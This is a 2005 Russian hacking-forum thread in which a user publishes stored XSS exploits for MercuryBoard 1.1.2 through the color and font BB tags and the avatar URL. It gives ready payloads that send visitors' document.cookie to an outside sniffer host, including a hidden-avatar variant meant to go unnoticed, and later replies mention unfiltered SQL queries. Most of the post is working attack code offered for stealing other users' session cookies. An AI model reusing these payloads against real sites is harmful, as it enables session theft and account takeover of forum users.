Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Еще парочка xss в MercuryBoard (https://forum.antichat.xyz/showthread.php?t=5971)

PinkPanther 10.04.2005 18:58

Еще парочка xss в MercuryBoard
 
Несколько уязвимостей xss в форуме MercuryBoard
(2 ПРИМИТИВНЕЙШИХ в bb тегах и 1 в аватарке)

1 из них заключается в плохой защищенности bb тега color, что дает нам право внедрить в него xss иньекцию.
Итак, вот сплойт:
Для алерта:
Код:

[color=black;background:url(javascript:alert(document.cookie))]123[/color]
И для сниффа:
Код:

[color=black;background:url(javascript:img.src=&#34http://antichat.ru/cgi-bin/s.jpg?&#34+document.cookie);]123[/color]
2 уязвимость заключается в плохой защищенности bb тега font, что также дает возможность внедрить в его тело вредоносный код.
Для алерта:
Код:

[font=courier;background:url(javascript:alert(document.cookie))]123[/font]
И для сниффа:
Код:

[font=courier;background:url(javascript:img.src=&#34http://antichat.ru/cgi-bin/s.jpg?&#34+document.cookie)]123[/font]
3 дыра самая интересная и самая матерая, это уязвимость в аватарке. Мы можем внедрить в адресс аватара свой сплойт, при этом со стороны это не будет никак выкупатся=), а сплойт тем временем будет собирать кукисы всех, кто будет читать ваши посты, или кто заглянет к вам в личный кабинет. При этом, при просмотре свойств аватара, пользователь не увидит ничего подозрительного, так как, в адресе будет указано http://smailiki.ru/smile/1.gif/ . Как видим, слеш в конце нам все поганит, это проявляется из-за экранирования знака (') ,бек слешем. Но с этим ничего не поделаешь, и хоть аватарка отображатся не будет, у обычных пользователей, да даже у админов, имхо это вызовет мало подозрений. Пускай думают что глюки.=)
Чуть не забыл, вот и сплойт:
Код:

http://smailiki.ru/smile/1.gif'style=background:url(javascript:img.src=&#34http://antichat.ru/cgi-bin/s.jpg?&#34+document.cookie;);1.gif
ну и как уже стало традицией, алерт:
Код:

http://smailiki.ru/smile/1.gif'style=background:url(javascript:alert(document.cookie));1.gif

PinkPanther 10.04.2005 19:01

Уже когда все набрал, подумал, а зачем аватврка нам вообще нужна, сделаем её невидимой, как будто бы её вообще нету. И ход этот правильный, так как палива в данной ситуации ноль. Итак, вот сплойт:
Код:

'style=background:url(javascript:img.src=&#34http://antichat.ru/cgi-bin/s.jpg?&#34+document.cookie);display:none;1.gif

Algol 11.04.2005 11:38

Укажи плиз версию MercuryBoard...
И кроме того, если публикуете такие баги, то не мешало бы описать систему защиты форума в целом. Хранится ли пасс в куках, не используется ли двойное хеширование и т.п. Потому как эти XSS могут ничего и не давать.

PinkPanther 11.04.2005 16:21

Цитата:

Сообщение от Algol
Укажи плиз версию MercuryBoard...
И кроме того, если публикуете такие баги, то не мешало бы описать систему защиты форума в целом. Хранится ли пасс в куках, не используется ли двойное хеширование и т.п. Потому как эти XSS могут ничего и не давать.

Я проганял это всё на форуме версии 1.1.2
В куках хранятся только id пользователя и его md5 хеш, следует на сниффер мы получаем эти данные. Вот алерт как пример:

http://oldhz.h14.ru/mer.png

qBiN 11.04.2005 17:03

пробовал ли на других форумах?

KEZ 11.04.2005 17:22

Помоему там все было найдено... Или я ошибаюсь

PinkPanther 11.04.2005 17:44

Цитата:

Сообщение от qBiN
пробовал ли на других форумах?

Ну вот скрин к примеру: http://rts.h15.ru/mer1.png и http://rts.h15.ru/mer2.png
Цитата:

Сообщение от KEZ
Помоему там все было найдено... Или я ошибаюсь

ХЗ, когда нашел прежде всего проверил на секлабе, таких нет, а были бы найдены, полюбому были бы там, имхо.

qBiN 11.04.2005 19:00

Цитата:

Сообщение от KEZ
Помоему там все было найдено... Или я ошибаюсь

Если не ошибаешься подскажи тогда для vBullentin'a и phpBB , вроде где-то читал что малую фильтрацию проходят и что можно "захватить"
cp юзверя в phpbb или я уже запамятовал...

PinkPanther 14.04.2005 17:14

Вот ещё одна xss`ска(в профиле): Интуиция подсказывает что это ещё не всё....

KEZ 16.04.2005 19:38

Да там ещё КСТАТИ почти ни один параметр не проверяется перед mysql_query


Время: 03:34